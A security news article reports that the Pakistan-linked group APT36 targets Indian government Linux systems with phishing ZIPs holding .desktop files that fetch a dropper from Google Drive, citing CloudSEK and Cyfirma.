Pakistan-linked state-sponsored cyberspies are targeting Indian government and defense entities with tailored malware in a fresh campaign, security researchers warn.
Active since at least 2013 and also tracked as Earth Karkaddan, Mythic Leopard, Operation C-Major, and Transparent Tribe, APT36 is known for its cyberespionage campaigns aimed at Indian government entities.Pakistani state-sponsored hacking group APT36 is targeting Linux systems in a fresh campaign aimed at Indian government entities.
In attacks carried out in August 2025, APT36 has been relying on a new infection technique: the use of Linux desktop entry (.desktop) files for malware delivery. These are plain text configuration files defining shortcuts and launchers and containing metadata about applications.
Delivered as part of a procurement-themed phishing campaign, the malicious files were packed inside ZIP archives, masquerading as documents. When opened, they would fetch a dropper from Google Drive and simultaneously display a decoy PDF file in Firefox, CloudSEK reports.
The dropper performs anti-debugging and anti-sandbox checks, sets up persistence on the system, and attempts to establish communication with the command-and-control (C&C) server using WebSockets.
“The use of Google Drive in their attack lifecycle represents a significant evolution in the threat group’s capabilities, introducing spear-phishing vectors that pose higher risks to Linux-based government and defense infrastructure,” CloudSEK notes.
The use of malware tailored specifically for Linux Boss environments shows an increase in APT36’s sophistication and flexibility, Cyfirma explains in a separate report.
“APT36’s capability to customize its delivery mechanisms according to the victim’s operating environment thereby increases its chances of success while maintaining persistent access to critical government infrastructure and evading traditional security controls,” the cybersecurity firm says.
The phishing emails observed by Cyfirma featured meeting notice themes but relied on the same infection mechanism, using .desktop files as loaders.
The security firm also points out that, while it remains focused on Indian government entities and adjacent sectors, APT36 was also seen opportunistically targeting organizations in other countries.
“The adoption of .desktop payloads targeting Linux Boss reflects a tactical shift toward exploiting indigenous technologies. Combined with traditional Windows-based malware and mobile implants, this shows the group’s intent to diversify access vectors and ensure persistence even in hardened environments,” Cyfirma notes.
Related: In Other News: India-Pakistan Cyberattacks, Radware Vulnerabilities, xAI Leak
Related: US, Dutch Authorities Disrupt Pakistani Hacking Shop Network
Related: Spy v Spy: Russian APT Turla Caught Stealing From Pakistani APT
Related: Security Firm Finds Flaws in Indian Online Insurance Broker
